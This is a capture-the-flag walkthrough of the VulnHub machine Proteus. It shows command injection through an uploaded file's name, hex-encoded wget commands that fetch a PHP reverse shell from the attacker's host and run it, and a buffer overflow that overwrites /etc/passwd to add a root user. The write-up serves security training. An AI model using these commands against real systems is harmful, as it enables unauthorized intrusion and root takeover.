Proteus is a relatively new machine that came on VulnHub. Created by Ivanvza, it surfaced on June 7th, 2017. It can be downloaded from https://www.vulnhub.com/entry/proteus-1,193/

The objective is to get root privileges and get the flag.

Downloaded and fired up, it presents with a login screen with no other information at all apart from telling us that it is a Corporate Malware Validator:

So, heading back to our attacking machine, Kali 2017.1, I run a simple command:

$ nmap 172.16.92.0/24

Now that we know the IP address of our target machine, let’s start by scanning it and see if we can get anything else:

For this case, I am using Zenmap, a GUI version of Nmap. The scan shows us that there are 2 ports open:

  • Port 22 – Used for SSH
  • Port 80 – Used to serve a web application

Let’s head to its port 80 and see what’s the web application we are dealing with:

On uploading a random file, I get the following message:

On uploading the right file type (application/x-executable, application/x-sharedlib formats supported) which was a sample C program I whipped up, I got the following on uploading it:

Looking at the output, it is clear that the system is running strings and objdump commands on the uploaded files. After doing some more research, I found out that ‘.‘ Moreover, ‘/‘ do not work.

This made me wonder whether I will be able to exploit it using RCE (Remote Code Execution). I thought to test it out with a basic Linux command.

To do that, I used Burp Suite and added the command id; after the file name that I was uploading:

and forwarded the request:

Ethical Hacking Training – Resources (InfoSec)

Now I know that RCE will work.

Now, time to add a shell.

I used a PHP-reverse-shell. However, we cannot upload the shell directly. I tried converting the commands into HEX and sent them the same way I sent the earlier commands.

I’ll be using the following format to send the request:

Echo HEX_CODE | xxd -r -p

And I’ll be converting the following commands into HEX:

wget http://172.16.92.141/shell.txt -O /tmp/shell.php

php /tmp/shell.php;

and their final code converts to be:

echo 7767657420687474703a2f2f3137322e31362e39322e3134312f7368656c6c2e747874202d4f202f746d702f7368656c6c2e706870 | xxd -r -p

echo 706870202F746D702F7368656C6C792E7068703B | xxd -r -p

I appended both commands the same way I appended the id command earlier and after running the second command, I got a reverse shell:



After digging for a little while, I came across a file called admin_login_logger and admin_login_request.js

Since I did not want to go back to the web application, I started to play around the first file.

After playing it with on my system, I realized that the file creates a new file at /var/log/proteus/log with the parameter we pass. For a long time, I played around with it, giving it various kinds of parameters, until, I entered a long parameter which crashed the file. To create that, I used a tool called pattern.py which can be found at https://raw.githubusercontent.com/Svenito/exploit-pattern/master/pattern.py

I ran the following command:

$ ./admin_login_logger ‘pattern.py 1024’


This made the file crash. After inspecting, I saw that a file was created in my current directory with the name first few characters of the string passed which made me wonder if I can figure out the extent of characters the file can take and use that to create a user on the target machine.

Upon running the following command:

$ pattern.py Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0A

I saw that it told me the first occurrence was at position 456. Time to exploit this:

To add a user, I need a password to enter in /etc/passwd


So, I added the following in /etc/passwd:

Chiragh:
$1$.T8Oa/jC$BSMBICcTHivnsn3RAXO6N/…:0:0::/tmp

Time to run the exploit:

$ ./admin_login_logger ‘chiragh:$1$.T8Oa/jC$BSMBICcTHivnsn3RAXO6N/…:0:0::/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/etc/passwd’

Followed by:

$ su chiragh

And we are root!!


The flag is a PNG image which can be found at /root. I uploaded the image and served a PHP server.

The following links can help understand few ways we used to crack the target machine:

http://www.unit-conversion.info/texttools/hexadecimal/